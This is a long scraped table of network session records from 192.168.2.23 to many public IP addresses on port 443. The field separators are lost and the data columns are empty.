                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13911192.168.2.2342576192.54.17.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13912192.168.2.2344100218.251.22.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13913192.168.2.233706272.210.70.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13914192.168.2.2348744189.126.190.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13915192.168.2.235138454.108.222.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13916192.168.2.2354040134.18.68.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13917192.168.2.233738065.196.89.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13918192.168.2.233970451.115.165.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13919192.168.2.2354600220.49.185.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13920192.168.2.2336872114.35.31.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13921192.168.2.235047871.252.116.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13922192.168.2.2340400108.180.226.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13923192.168.2.234770435.253.241.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13924192.168.2.2334666151.164.237.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13925192.168.2.234741671.192.239.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13926192.168.2.235235871.97.133.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13927192.168.2.234700675.239.211.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13928192.168.2.2357928144.128.183.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13929192.168.2.233992259.140.255.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13930192.168.2.235479872.146.97.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13931192.168.2.234593474.161.195.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13932192.168.2.234013689.234.183.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13933192.168.2.2347022128.36.128.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13934192.168.2.2343574172.201.216.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13935192.168.2.236017681.57.40.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13936192.168.2.2359554168.7.176.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13937192.168.2.23558761.116.90.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13938192.168.2.2338754181.250.100.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13939192.168.2.233757035.13.227.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13940192.168.2.2336410168.208.102.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13941192.168.2.23428602.244.24.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13942192.168.2.2349210203.11.93.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13943192.168.2.234753249.45.41.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13944192.168.2.235508284.71.139.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13945192.168.2.234010219.25.230.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13946192.168.2.2354786223.165.198.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13947192.168.2.23354288.33.220.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13948192.168.2.2346166144.247.236.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13949192.168.2.23512342.172.75.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13950192.168.2.2344806120.94.242.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13951192.168.2.2334044138.66.174.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13952192.168.2.2347342178.113.25.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13953192.168.2.2337562190.185.187.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13954192.168.2.233877470.34.47.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13955192.168.2.2360306207.47.168.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13956192.168.2.2345322189.225.76.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13957192.168.2.2348618153.255.229.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13958192.168.2.2342306213.76.226.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13959192.168.2.2349304181.114.40.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13960192.168.2.233684279.171.148.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13961192.168.2.2338938207.91.112.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13962192.168.2.234808427.208.221.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13963192.168.2.234456413.250.53.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13964192.168.2.2354598218.96.159.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13965192.168.2.2343364138.58.44.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13966192.168.2.2340190189.139.42.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13967192.168.2.2338676122.232.74.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13968192.168.2.233967697.27.85.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13969192.168.2.234753044.28.231.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13970192.168.2.2339852184.40.255.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13971192.168.2.2360750109.96.88.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13972192.168.2.2342196109.72.184.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13973192.168.2.233779272.8.42.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13974192.168.2.234124620.182.186.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13975192.168.2.2358044139.105.136.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13976192.168.2.2353888189.42.145.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13977192.168.2.234511052.110.223.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13978192.168.2.2357900172.190.177.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13979192.168.2.2357762211.170.146.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13980192.168.2.2359500165.148.145.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13981192.168.2.2338048147.137.98.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13982192.168.2.2344240109.222.106.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13983192.168.2.233694899.126.27.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13984192.168.2.2360116163.7.104.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13985192.168.2.2337584151.228.197.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13986192.168.2.235671262.121.197.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13987192.168.2.233280281.157.164.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13988192.168.2.233448471.180.23.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13989192.168.2.2341470218.3.76.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13990192.168.2.2341630118.110.177.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13991192.168.2.2353652223.30.64.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13992192.168.2.2338586185.155.43.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13993192.168.2.2353198186.22.248.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13994192.168.2.234379038.241.126.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13995192.168.2.2352550141.152.127.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13996192.168.2.2332872168.237.154.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13997192.168.2.2346932164.6.220.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13998192.168.2.2336436208.66.30.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            13999192.168.2.23450264.67.220.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14000192.168.2.234316053.220.2.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14001192.168.2.2355016137.74.246.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14002192.168.2.234230859.201.60.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14003192.168.2.234425060.94.129.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14004192.168.2.235238674.24.228.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14005192.168.2.2355268153.78.194.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14006192.168.2.2356744104.182.135.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14007192.168.2.235999264.97.155.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14008192.168.2.2333356198.180.214.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14009192.168.2.2343102136.252.219.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14010192.168.2.2352556187.103.219.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14011192.168.2.234313093.185.159.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14012192.168.2.235220269.208.176.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14013192.168.2.235377668.104.119.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14014192.168.2.2336434200.78.63.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14015192.168.2.233970258.206.40.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14016192.168.2.2342082223.196.18.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14017192.168.2.2343850192.41.64.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14018192.168.2.2347930128.177.42.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14019192.168.2.2335146116.248.165.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14020192.168.2.2336828114.11.234.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14021192.168.2.2335306132.250.135.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14022192.168.2.2350520161.181.194.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14023192.168.2.2349584209.55.211.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14024192.168.2.2360640202.238.167.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14025192.168.2.2334366126.20.92.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14026192.168.2.233482027.95.106.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14027192.168.2.2354160176.203.241.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14028192.168.2.2358040202.100.123.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14029192.168.2.236041899.234.151.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14030192.168.2.233945240.155.235.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14031192.168.2.235750017.89.10.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14032192.168.2.2357064124.82.41.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14033192.168.2.233393887.39.130.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14034192.168.2.2351068180.143.209.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14035192.168.2.2351054131.43.65.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14036192.168.2.2358676180.80.69.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14037192.168.2.234893060.180.65.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14038192.168.2.233286495.148.129.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14039192.168.2.235211065.200.67.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14040192.168.2.2338648135.226.167.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14041192.168.2.2348196189.222.116.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14042192.168.2.234696068.36.159.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14043192.168.2.2354792138.228.181.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14044192.168.2.2333230198.235.66.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14045192.168.2.233950084.231.24.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14046192.168.2.2341252173.24.186.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14047192.168.2.2358820168.219.140.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14048192.168.2.2332986202.139.107.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14049192.168.2.234298268.212.157.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14050192.168.2.234193642.75.204.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14051192.168.2.2345180171.116.53.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14052192.168.2.2336488216.199.80.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14053192.168.2.233793219.249.230.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14054192.168.2.2351186208.248.148.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14055192.168.2.2357688156.221.209.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14056192.168.2.233950494.103.108.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14057192.168.2.2336796101.16.6.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14058192.168.2.235333225.46.58.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14059192.168.2.2340966100.31.255.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14060192.168.2.2332818206.243.210.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14061192.168.2.2349464188.21.149.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14062192.168.2.234891842.29.175.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14063192.168.2.233364694.217.13.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14064192.168.2.235501047.213.60.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14065192.168.2.234035249.170.194.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14066192.168.2.2359626110.32.171.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14067192.168.2.233429441.100.208.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14068192.168.2.2349110103.42.70.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14069192.168.2.2347268138.37.185.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14070192.168.2.2348508156.113.157.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14071192.168.2.234892853.45.254.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14072192.168.2.234569460.181.31.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14073192.168.2.2341574170.148.2.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14074192.168.2.2358936136.82.240.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14075192.168.2.23347748.226.174.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14076192.168.2.235596260.118.193.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14077192.168.2.2333060204.162.103.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14078192.168.2.2357312119.51.131.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14079192.168.2.2344682138.222.37.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14080192.168.2.2356522153.155.191.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14081192.168.2.2357118150.227.81.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14082192.168.2.2359800182.156.96.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14083192.168.2.2334346122.190.95.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14084192.168.2.2359874210.153.56.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14085192.168.2.2334068136.190.47.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14086192.168.2.2339076107.227.163.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14087192.168.2.2348266178.150.198.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14088192.168.2.235319099.183.111.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14089192.168.2.2336732134.12.72.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14090192.168.2.23474588.144.217.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14091192.168.2.235262494.112.239.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14092192.168.2.234758473.248.233.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14093192.168.2.2345020220.157.247.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14094192.168.2.234477873.0.66.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14095192.168.2.235283654.168.127.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14096192.168.2.2339524170.121.64.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14097192.168.2.233612243.32.13.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14098192.168.2.233419444.186.250.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14099192.168.2.234192058.156.29.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14100192.168.2.234453646.5.196.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14101192.168.2.2354852105.169.43.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14102192.168.2.235235266.240.26.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14103192.168.2.2334744221.206.146.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14104192.168.2.2333970192.218.192.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14105192.168.2.2356892147.196.8.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14106192.168.2.23375288.245.89.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14107192.168.2.235927263.73.143.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14108192.168.2.2355112161.181.126.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14109192.168.2.2359202149.110.121.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14110192.168.2.2359532115.110.211.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14111192.168.2.2336550185.45.14.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14112192.168.2.2333536165.59.31.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14113192.168.2.235291849.109.75.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14114192.168.2.2339832157.136.122.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14115192.168.2.234209013.79.188.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14116192.168.2.233769441.251.165.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14117192.168.2.2358202154.177.154.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14118192.168.2.2358928110.219.74.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14119192.168.2.235593082.164.220.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14120192.168.2.2335142141.63.230.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14121192.168.2.233793846.162.105.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14122192.168.2.233670249.149.195.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14123192.168.2.2340002130.254.216.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14124192.168.2.2340952132.138.28.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14125192.168.2.2339010156.237.225.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14126192.168.2.235304617.232.207.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14127192.168.2.2352154103.88.69.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14128192.168.2.2357394141.113.240.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14129192.168.2.2349626101.227.94.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14130192.168.2.2339282118.210.112.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14131192.168.2.2341314179.92.126.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            14132192.168.2.2351304157.219.75.5443
